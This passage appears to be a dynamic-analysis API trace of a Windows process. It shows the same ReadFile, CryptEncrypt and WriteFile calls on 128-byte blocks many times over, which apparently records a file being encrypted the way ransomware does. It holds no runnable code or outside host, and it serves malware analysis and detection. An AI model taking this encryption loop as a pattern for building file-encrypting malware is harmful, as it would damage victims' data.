lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.115] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.115] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.115] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.115] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.115] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.115] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.116] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.116] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.116] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.116] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.116] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.116] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.116] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.116] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.116] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.116] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.116] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.116] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.116] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.116] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.116] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.116] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.116] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.116] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.116] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.116] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.116] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.116] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.116] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.117] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.117] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.117] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.117] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.117] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.117] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.117] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.117] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.117] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.117] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.117] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.117] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.117] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.117] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.117] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.117] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.117] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.117] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.117] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.117] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.117] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.117] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.118] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.118] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.118] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.118] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.118] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.118] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.118] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.118] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.118] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.118] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.118] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.118] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.118] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.118] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.118] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.118] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.118] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.118] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.118] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.118] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.118] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.118] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.119] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.119] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.119] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.119] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.119] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.119] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.119] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.119] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.119] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.119] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.119] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.119] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.119] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.119] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.119] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.119] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.119] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.119] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.119] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.119] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.119] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.119] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.119] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.120] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.120] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.120] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.120] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.120] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.120] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.120] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.120] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.120] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.120] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: 